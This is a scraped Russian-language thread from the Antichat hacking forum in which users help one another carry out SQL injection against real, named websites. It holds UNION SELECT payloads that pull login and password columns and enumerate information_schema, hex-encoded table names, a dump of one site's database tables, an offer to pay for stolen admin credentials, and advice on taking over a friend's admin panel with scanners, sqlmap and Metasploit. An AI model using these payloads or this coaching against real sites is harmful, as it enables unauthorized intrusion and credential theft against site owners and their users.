ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Уязвимости CMS / форумов (https://forum.antichat.io/forumdisplay.php?f=16)
-   -   SQL-инъекция в MySQL (https://forum.antichat.io/showthread.php?t=8036504)

D@Gshram 31.03.2012 01:00

хотел узнать что это такое
code:

Notice: Undefined variable: aNode in /home/a83006/soft.siza.us/html/_v/nodes.php on line 70 Call Stack: 0,0000 637136 1. {main}() /home/a83006/soft.siza.us/html/index.php:0 0,0030 1237640 2. require('/home/a83006/soft.siza.us/html/_v/nodes.php') /home/a83006/soft.siza.us/html/index.php:16

An0nYm 31.03.2012 01:00

Цитата:

Сообщение от D@Gshram

хотел узнать что это такое
code:

Notice: Undefined variable: aNode in /home/a83006/soft.siza.us/html/_v/nodes.php on line 70 Call Stack: 0,0000 637136 1. {main}() /home/a83006/soft.siza.us/html/index.php:0 0,0030 1237640 2. require('/home/a83006/soft.siza.us/html/_v/nodes.php') /home/a83006/soft.siza.us/html/index.php:16

Это предупреждение, самая безобидна ошибка(предупреждение).

D@Gshram 31.03.2012 01:00

спасибо всем за помощь! у меня такой вопрос, есть ли еще способы взлома сайтов кроме xss,xsfr,sql,php includ. если да то прошу написать что за методы или адрес на статью. спасибо заранее!

TeRoR4Ek 26.04.2012 01:00

Вопрос , Возможна ли SQL инекция вот тут
http://murclub.ru/config/db.php

Rolexx93 26.04.2012 01:00

Цитата:

Сообщение от TeRoR4Ek

Вопрос , Возможна ли SQL инекция вот тут
http://murclub.ru/config/db.php

Вроде SQL инъкцией не пахнет)ошибка в коде...

M@ZAX@KEP 02.05.2012 01:00

Цитата:


почитал немного не понял



Цитата:


с помощью Havij не смог раскрутить



Ты не читал и не пытался понять если стал крутить с havij.

D@Gshram 02.05.2012 01:00

Цитата:

Сообщение от M@ZAX@KEP

Ты не читал и не пытался понять если стал крутить с havij.

я сначала крутил, но не получилось. почитал статьи но нигде понял насчет колонок ( а ротом понял что с помощью Havij невозможно раскрутить так-как на сайте сначала нужно зарегистрироваться...

кто-нибудь поможет мне? вот сайт Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
сначала нужно регаться!!! прошу снять мини видео как раскрутить этот скуль. очень прошу!!!

FROD-ik 02.05.2012 01:00

Цитата:

Сообщение от D@Gshram

я сначала крутил, но не получилось. почитал статьи но нигде понял насчет колонок ( а ротом понял что с помощью Havij невозможно раскрутить так-как на сайте сначала нужно зарегистрироваться...

кто-нибудь поможет мне? вот сайт Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
сначала нужно регаться!!! прошу снять мини видео как раскрутить этот скуль. очень прошу!!!

http://maxmob.ru/smiles.php?id=4&#39...S+--+&look_dir

дальше сам.

D@Gshram 02.05.2012 01:00

почитал немного не понял , то есть не смог вытащить данные с базы. имеется sql но с помощью Havij не смог раскрутить кто поможет?

D@Gshram 03.05.2012 01:00

Цитата:

Сообщение от FROD-ik

http://maxmob.ru/smiles.php?id=4&#39...S+--+&look_dir

дальше сам.

помогите кто-нибудь раскрутить sql. дам 150руб кто объяснит последние три шага +лог.пароль. BL 17

FROD-ik 04.05.2012 01:00

Цитата:

Сообщение от D@Gshram

помогите кто-нибудь раскрутить sql. дам 150руб кто объяснит последние три шага +лог.пароль. BL 17

это говорит, что Вы нихера ничего не читали, а тока ждете когда за вас все сделают...
Ваши 150р. никому не нужны, уже наверно и базу слили и пароль админа получил)

rossamaha 16.05.2012 01:00

Здравствуйте, нашел скуль на одном сайте, выполнил все действия и перешел уже почти казалось к выводу данных из колонки login,pass и тут такая хрень,

код который использовал.

source:

Код:

site.com/news.php?
id
=-14+UNION+SELECT+1,group_concat(
id
,0x3b,login,0x3b,pass),3,4,5,6,7,8+from+master_login


Вывода на экран не было. только, ошибка вылетела

code:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/u0786019/data/www/site.com/news.php on line 122

и вместо данных получил.
{TOPTITLE}

M@ZAX@KEP 16.05.2012 01:00

Попробуй master_login в SQL-Hex закатать.

lex1094 20.07.2012 01:00

Подниму тему, так как возник вопрос.
Не могу определить наименование колонок одной из таблиц.
Ввожу site.com/index.php?action=price&id=-1+UNION+SELECT+1,2,3,4,group_concat(column_name),6 ,7,8,9,10,11+from+information_schema.columns+where +table_name= 0x61646d696e--
И ничего не происходит. И объясните пожалуйста, что это такое: 0x61646d696e?
Как мне правильно сделать запрос, чтобы получить информацию?

M@ZAX@KEP 21.07.2012 01:00

0x61646d696e это sql-hex. 0x просто указывает sql, что следом идёт heх строка. В данном случае там должно быть имя таблицы, колонки которой ты пытаешься узнать.

lex1094 21.07.2012 01:00

Цитата:

Сообщение от M@ZAX@KEP

0x61646d696e это sql-hex. 0x просто указывает sql, что следом идёт heх строка. В данном случае там должно быть имя таблицы, колонки которой ты пытаешься узнать.

Всё равно не получается узнать колонки, просто ошибку выдаёт и всё. Почему так происходит?

lex1094 22.07.2012 01:00

Вот тот самый сайт: http://www.climatelab.ru/index.php?action=price&pid=2
Вот данные которые я уже вытянул:

Цитата:


Появившеяся цифра: 5
Текущая БД: climatea_clim
Текущий пользователь MySQL: climatea_clim@localhost
Версия MySQL: 5.1.63-cll

Таблицы:
CHARACTER_SETS
CLIENT_STATISTICS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
INDEX_STATISTICS
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TABLE_STATISTICS
THREAD_STATISTICS
TRIGGERS
USER_PRIVILEGES
USER_STATISTICS
VIEWS
climat_aqua
climat_aqua_prod
climat_catalog
climat_catalog_prod
climat_climat
climat_condit
climat_condit_prod
climat_config
climat_count
climat_news
climat_pages
climat_split

M@ZAX@KEP 22.07.2012 01:00

Ты хочешь чтобы за тебя раскрутили или хочешь понять, в чём твоя ошибка и почему мускуль выдаёт error? Тогда тащи саму ошибку и запрос, с которым её получил.

M@ZAX@KEP 22.07.2012 01:00

Экстрасенсов нет. Тащи ошибку.

lex1094 23.07.2012 01:00

Цитата:

Сообщение от M@ZAX@KEP

Ты хочешь чтобы за тебя раскрутили или хочешь понять, в чём твоя ошибка и почему мускуль выдаёт error?

Я хочу понять в чём моя ошибка. Мне бы расписать что я делаю не так и показать пример, как нужно делать правильно, раскручивать за меня я не прошу.

beknazar 24.07.2012 01:00

http://www.climatelab.ru/index.php?a...chema.tables-- Вот раскрученная до вывода таблиц.

Ixacker 11.08.2012 01:00

Нашел тут один сайтик, зашел в админку. Надо теперь слить БД. Админка странная.

Protocoler 13.08.2012 01:00

Подскажите пожалуйста, а как ставить кавычку или вообще искать иньекцию в таком виде ЮРЛ ?

code:

http://www.ozon.ru/context/detail/id/1687140/

de.p0is0n 13.08.2012 01:00

Цитата:

Сообщение от Protocoler

Подскажите пожалуйста, а как ставить кавычку или вообще искать иньекцию в таком виде ЮРЛ ?

code:

http://www.ozon.ru/context/detail/id/1687140'/

В таком виде можно найти уязвимость.

Protocoler 13.08.2012 01:00

а, значит я правильно пробовал. спасибо !

Ultromarin 04.06.2013 01:00

Здравствуйте уважаемые форумчане!
Я тут не давно на вашем сайте и по этому не знаю всех тонкостей данных действий по SQL,но хотел бы научится!У меня знакомый держит внутрисетевой сайт и я хочу у него угнать админку(ради шутки),подскажите с чего начать?Мануал почитал вроде понял но почему то не получается найти ошибку,выкидывает на белую страницу на которой пишется следующее:
1.Forbidden
You don't have permission to access /index.php" on this server.

2.Hacking attempt! и т.д. сайт: http://sector27.ru

Подскажите пожалуйста начинающему кому не трудно,можно в лс что бы не флудить,буду благодарен!

de.p0is0n 04.06.2013 01:00

Цитата:

Сообщение от Ultromarin

Здравствуйте уважаемые форумчане!
Я тут не давно на вашем сайте и по этому не знаю всех тонкостей данных действий по SQL,но хотел бы научится!У меня знакомый держит внутрисетевой сайт и я хочу у него угнать админку(ради шутки),подскажите с чего начать?Мануал почитал вроде понял но почему то не получается найти ошибку,выкидывает на белую страницу на которой пишется следующее:
1.Forbidden
You don't have permission to access /index.php" on this server.

2.Hacking attempt! и т.д. сайт: http://sector27.ru

Подскажите пожалуйста начинающему кому не трудно,можно в лс что бы не флудить,буду благодарен!

Сначала посмотри на дату последнего поста.

Ultromarin 04.06.2013 01:00

Цитата:

Сообщение от de.p0is0n

Сначала посмотри на дату последнего поста.

уважаемый и для этого надо ставить минус в репу?
а подсказать по ситуации не можете?
я думал вы адекватные люди...

Apple96 04.06.2013 01:00

Цитата:

Сообщение от Ultromarin

2.Hacking attempt! и т.д. сайт: http://sector27.ru

Во- первых, сайт не доступен (мб это только у меня), во- вторых проверь какой стоит двигатель,
мне кажется, что это dle, проверь путь sector27.ru/admin.php, если это подтвердится, то можешь и не стараться искать уязвимость..

Ultromarin 05.06.2013 01:00

Цитата:

Сообщение от Apple96

Во- первых, сайт не доступен (мб это только у меня), во- вторых проверь какой стоит двигатель,
мне кажется, что это dle, проверь путь sector27.ru/admin.php, если это подтвердится, то можешь и не стараться искать уязвимость..

сайт у вас не доступен по той причине что он внутрисетевой(по провайдеру),я на этом сайте гл.редактор и по ссылке которую вы написали меня выкидывает на админ панель редактора новостей,я так полагаю что админку угнать у меня не получится?

kipishnoy 05.06.2013 01:00

Цитата:

Сообщение от Ultromarin

я так полагаю что админку угнать у меня не получится?

Не верно полагает!
Еще как получиться, нужно просто находиться в вашей подсети.

BlaIzEr 05.06.2013 01:00

Попробуй пройтись сканером по сайту к примеру acuentix'ом , если не вывело серьезных нарушений безопасности, попробуй определить двиг сайта и поискать сплоиты под него, как вариант .

kipishnoy 05.06.2013 01:00

Цитата:

Сообщение от BlaIzEr

Попробуй пройтись сканером по сайту к примеру acuentix'ом , если не вывело серьезных нарушений безопасности, попробуй определить двиг сайта и поискать сплоиты под него, как вариант .

Начинать нужно не с этого сканера, изначально нужно понять на чем крутится сайт. Далее нужно просканировать n-map это даст нам общие понимание. Вот уже после этих действий мы берем разного рода инструменты.
Лучше всего создать свой профиль сканирования именно для sql и xss, если сканировать acuentix'ом то можно отметь галочку скан портов, он же автоматом пробрутит их на стандартные пас:лог.

otoko212 28.07.2015 01:00

Отлично описано, понял, что мне нужно зарегиться после этого на этом форуме поскольку есть пару сайтов для проверки.

ZyXHoResT 29.07.2015 01:00

В Kali Linux есть 2 очень удобные программы для sql-иньекций c очень большой базой уязвимостей.

1. sqlmap
2. Metasploit

P.S. Их там больше но эти считаются самыми удобными и самыми удачными.


Время: 22:26